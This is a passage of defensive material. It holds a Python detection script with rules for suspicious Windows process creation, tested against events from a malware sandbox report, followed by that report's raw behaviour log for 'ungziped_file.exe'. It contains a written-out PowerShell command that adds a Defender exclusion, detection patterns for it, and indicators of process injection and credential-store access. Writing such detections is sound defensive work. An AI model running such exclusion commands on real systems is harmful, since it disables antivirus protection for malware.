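    cmdline: str        # its command line
    parent_image: str   # full path of the creating process, "" when unknown


SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}
SHELLS = {"explorer.exe"}
# Covers -ExclusionPath as well as -ExclusionProcess / -ExclusionExtension.
DEFENDER_EXCLUSION = re.compile(r"add-mppreference\s+-exclusion", re.I)


def under(path: str, prefix: str) -> bool:
    return path.lower().startswith(prefix.lower())


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def rule_defender_exclusion(ev: ProcEvent) -> bool:
    """PowerShell adding a Defender exclusion (requires an elevated session)."""
    return bool(DEFENDER_EXCLUSION.search(ev.cmdline))


def rule_self_spawn(ev: ProcEvent) -> bool:
    """An executable under C:\\Users launching a fresh copy of itself, the usual
    prelude to hollowing. Scoped to the user profile because browsers and other
    installed software self-spawn legitimately."""
    return ev.parent_image.lower() == ev.image.lower() and under(ev.image, "c:\\users\\")


def rule_system_binary_odd_parent(ev: ProcEvent) -> bool:
    """A System32/SysWOW64 binary created by a process outside C:\\Windows that
    is not the shell: powershell.exe (parent on the Desktop) and SndVol.exe
    (parent in a random-named Program Files (x86) directory) both qualify."""
    if not ev.parent_image or not any(under(ev.image, d) for d in SYSTEM_DIRS):
        return False
    return not under(ev.parent_image, "c:\\windows\\") and basename(ev.parent_image) not in SHELLS


def rule_browser_odd_parent(ev: ProcEvent) -> bool:
    """A browser started by something other than the shell or another browser,
    as with SndVol.exe starting Firefox here."""
    return (basename(ev.image) in BROWSERS and bool(ev.parent_image)
            and basename(ev.parent_image) not in BROWSERS | SHELLS)


RULES = {
    "defender_exclusion": rule_defender_exclusion,
    "self_spawn": rule_self_spawn,
    "system_binary_odd_parent": rule_system_binary_odd_parent,
    "browser_odd_parent": rule_browser_odd_parent,
}


def evaluate(events):
    """Return sorted (rule, pid) pairs for every event that trips a rule."""
    return sorted((name, ev.pid) for ev in events for name, fn in RULES.items() if fn(ev))


UNGZIPED = r"C:\Users\user\Desktop\ungziped_file.exe"
POWERSHELL = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
SNDVOL = r"C:\Windows\SysWOW64\SndVol.exe"
DROPPED = (r"C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc"
           r"\K1A8707LwM6.exe")

# Constructed from the report's process tree; pids 0, 5 and 16 are the report's
# process numbers, the others are assumed.
SAMPLE_EVENTS = [
    ProcEvent(0, UNGZIPED, f'"{UNGZIPED}"', ""),
    ProcEvent(1, POWERSHELL,
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
              r'Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ungziped_file.exe"',
              UNGZIPED),
    ProcEvent(2, r"C:\Windows\System32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1", POWERSHELL),
    ProcEvent(5, UNGZIPED, f'"{UNGZIPED}"', UNGZIPED),
    ProcEvent(3, r"C:\Windows\System32\wbem\WmiPrvSE.exe",
              r"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding", POWERSHELL),
    ProcEvent(4, r"C:\Windows\System32\svchost.exe",
              r"C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS", ""),
    ProcEvent(16, SNDVOL, f'"{SNDVOL}"', DROPPED),
    ProcEvent(17, r"C:\Program Files\Mozilla Firefox\firefox.exe",
              r'"C:\Program Files\Mozilla Firefox\Firefox.exe"', SNDVOL),
]

if __name__ == "__main__":
    for rule, pid in evaluate(SAMPLE_EVENTS):
        print(f"{rule:26s} pid {pid}")
```

On a live host the same three fields map directly onto Sysmon event ID 1 or Security event 4688 (Image, ParentImage, CommandLine). The exclusion itself survives the infection and can be audited afterwards with Get-MpPreference, whose ExclusionPath property lists every excluded path; an entry pointing into a user profile, as here, is worth removing and investigating.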
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: wsmauto.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: miutils.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: wsmsvc.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: dsrole.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: pcwum.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: mi.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: wkscli.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: webio.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: winnsi.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: usermgrcli.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelclient.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: coremessaging.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: twinapi.appcore.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: resourcepolicyclient.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: vssapi.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: vsstrace.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: samcli.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: samlib.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: es.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: bitsproxy.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: schannel.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: mskeyprotect.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: ntasn1.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: ncrypt.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: ncryptsslp.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: msasn1.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: dpapi.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: mpr.dll
                Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: dwmapi.dll
                Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\SndVol.exe | Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe | Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe | Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\ungziped_file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: Window Recorder | Window detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\ungziped_file.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\SndVol.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: ungziped_file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: ungziped_file.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: ungziped_file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: SndVol.pdbGCTL | source: K1A8707LwM6.exe, 0000000F.00000002.3510669412.00000000007CE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP | source: ungziped_file.exe, 00000005.00000002.1397449431.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000010.00000003.1401922869.000000000504E000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3512354987.0000000005200000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3512354987.000000000539E000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000010.00000003.1393117076.0000000004E9B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb | source: ungziped_file.exe, ungziped_file.exe, 00000005.00000002.1397449431.00000000011B0000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, SndVol.exe, 00000010.00000003.1401922869.000000000504E000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3512354987.0000000005200000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000010.00000002.3512354987.000000000539E000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000010.00000003.1393117076.0000000004E9B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: SndVol.pdb | source: K1A8707LwM6.exe, 0000000F.00000002.3510669412.00000000007CE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: K1A8707LwM6.exe, 0000000F.00000000.1319299130.0000000000CEF000.00000002.00000001.01000000.0000000C.sdmp, K1A8707LwM6.exe, 00000011.00000002.3510839344.0000000000CEF000.00000002.00000001.01000000.0000000C.sdmp

                Data Obfuscation

                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, CXux7G8Bf9KDYHKbCO.cs | .Net Code: QAZPRhBP1V System.Reflection.Assembly.Load(byte[])
                Source: ungziped_file.exe | Static PE information: 0xD8E8667E [Thu Apr 26 07:40:46 2085 UTC]
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_00414C8A push edi; retf 1685h | 5_2_00414C84
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_004140F8 pushfd ; retf | 5_2_00414115
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_004088BC push 00000002h; iretd | 5_2_004088D5
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_00401959 push ds; ret | 5_2_0040195A
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_00414103 pushfd ; retf | 5_2_00414115
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_00402219 push cs; ret | 5_2_00402225
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_00404A35 push ss; iretd | 5_2_00404A40
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_00401345 pushad ; iretd | 5_2_0040134A
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_00414B0B pushad ; ret | 5_2_00414B0E
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_0040DB16 push edi; retf | 5_2_0040DB17
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_00403640 push eax; ret | 5_2_00403642
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_00424653 push ecx; iretd | 5_2_0042465C
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_0041867E push ecx; iretd | 5_2_00418680
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_004196F4 push ebp; iretd | 5_2_00419715
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_0041969C push esi; retf | 5_2_0041969D
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_00401F76 push ebp; iretd | 5_2_00401F7F
                Source: C:\Users\user\Desktop\ungziped_file.exe | Code function: 5_2_011E09AD push ecx; mov dword ptr [esp], ecx | 5_2_011E09B6
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_052309AD push ecx; mov dword ptr [esp], ecx | 16_2_052309B6
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_032A13F2 push ss; iretd | 16_2_032A13FD
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_032A5279 push 00000002h; iretd | 16_2_032A5292
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_032B503B push ecx; iretd | 16_2_032B503D
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_032C1004 push ecx; iretd | 16_2_032C1019
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_032C1010 push ecx; iretd | 16_2_032C1019
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_032B6059 push esi; retf | 16_2_032B605A
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_032B60B1 push ebp; iretd | 16_2_032B60D2
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_032C0676 pushfd ; ret | 16_2_032C0699
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_032C0680 pushfd ; ret | 16_2_032C0699
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_032B0AB5 pushfd ; retf | 16_2_032B0AD2
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_032B0AC0 pushfd ; retf | 16_2_032B0AD2
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_032C0E1F push cs; retf | 16_2_032C0EC5
                Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 16_2_032C0E7E push cs; retf | 16_2_032C0EC5
                Source: ungziped_file.exe | Static PE information: section name: .text entropy: 7.893338109024411
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, ogmAnGPWM5AdYaBAIJ.cs | High entropy of concatenated method names: 'r5G836aQfE', 'Gqt8Lt66pu', 'RpK6wQpOjb', 'x9V6qJKQXk', 'Reo60Ey1R0', 'kY46kgtD9q', 'PLv6VlPLHx', 'GZs6SLp4Cw', 'boG6i45gtc', 'Pbr6atOq9f'
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, VM3VC0ALniXHIctVQP.cs | High entropy of concatenated method names: 'vKEx6O730T', 'uHvx8BaLOL', 'FUGxeyBBAK', 'GpTxuu28Xe', 'lvnxcxCXCk', 'zd1xZgDNvp', 'Next', 'Next', 'Next', 'NextBytes'
